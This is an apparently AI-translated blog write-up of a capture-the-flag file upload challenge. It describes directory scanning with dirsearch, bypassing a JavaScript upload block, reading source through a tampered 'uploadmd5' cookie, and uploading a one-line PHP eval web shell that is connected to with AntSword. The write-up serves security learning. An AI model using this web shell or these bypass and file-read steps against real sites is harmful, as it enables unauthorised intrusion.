banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel
HomeArchivesPortfoliosNftAboutShotrs

A file upload question that does not display the path after redirection.

#文件上传187
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses a file upload challenge in the context of cybersecurity. The author explores the process of finding the backend and scanning for potential vulnerabilities. They discover an upload point and use Burp Suite to intercept the upload process. By modifying the uploadmd5 value, they are able to read the source code and determine the file upload path. The author successfully uploads a file and obtains the flag. The article provides references for further reading on the topic.

Background#

Organizing neglected target fields

Process#

Target machine address

When opened, it looks like this:

image

The hint is already obvious, let us find the backend to upload a shell and obtain the root directory key of the website.

Discovering the Upload Point#

Let's start by scanning the backend using dirsearch

python dirsearch.py -u xxx.xxx.xxx.xxx:yyy -e asp,php -x 400,403,404,500,503,514,564 -F -t 300 --random-agents --http-method head

image

Hmm, all under the admin directory. Accessing the admin page alone shows a blank page, so let's add upload.php:

image

It redirects to upload1.php first, with a pop-up showing no permission to upload, then redirects to upload2.php:

image

As a former CTF newbie, my intuition tells me that there is a problem with upload1.php, so let's intercept it with burp:

image

Hmm, in the returned page, we can clearly see a form. The first thing to consider for the intercepted pop-up is front-end js.

Disable javascript in the browser, re-access upload.php, and after redirecting to upload1.php, the upload box is displayed:

image

Let's just go for it and upload a test.php with the following content:

<?php @eval($_POST['aa']);?>

image

Upload successful, redirected to upload_file.php. Yeah! Wait a minute, where's the path? @(black line)

Obtaining the Upload Path#

Getting a bit impulsive, let's intercept the upload interface of upload1.php again using burp:

image

Hmm, everything seems normal, but after uploading, it doesn't provide the path. Let's take a closer look at the validation cookie:

Cookie:uploadmd5=verify%2F266c9bd3c1cd6c9e.txt;

This validation string 266c9bd3c1cd6c9e is generally useful. Since it redirects to upload_file.php, the code that generates the path for uploading the shell must be in the upload_file.php file.

Let's try changing the value of uploadmd5 to upload_file.php and see if we can read the source code (it's like an arbitrary file read vulnerability):

image

OHHHHHHH, we have successfully read the source code of the upload:

<?php
$path="uploadfile/";//Upload path
$verify=$_POST["verify"];
$time=date("Ymd");
if($_FILES["filename"]["name"])
{
$file1=$_FILES["filename"]["name"];
$file2 = $path.$time.'_'.$verify.'_'.$file1;
$flag=1;
}
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);
if($result) echo "Upload successful!";

?>

The statement for constructing the upload file path has also been found: $path.$time.'_'.$verify.'_'.$file1

That is, upload directory.date("Ymd")_value of verify_file name

So the path of the uploaded file should be: admin/uploadfile/20200331_266c9bd3c1cd6c9e_test.php

Result#

AntSword connection:

image

Successfully obtained the flag:

image

References:

End of article.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.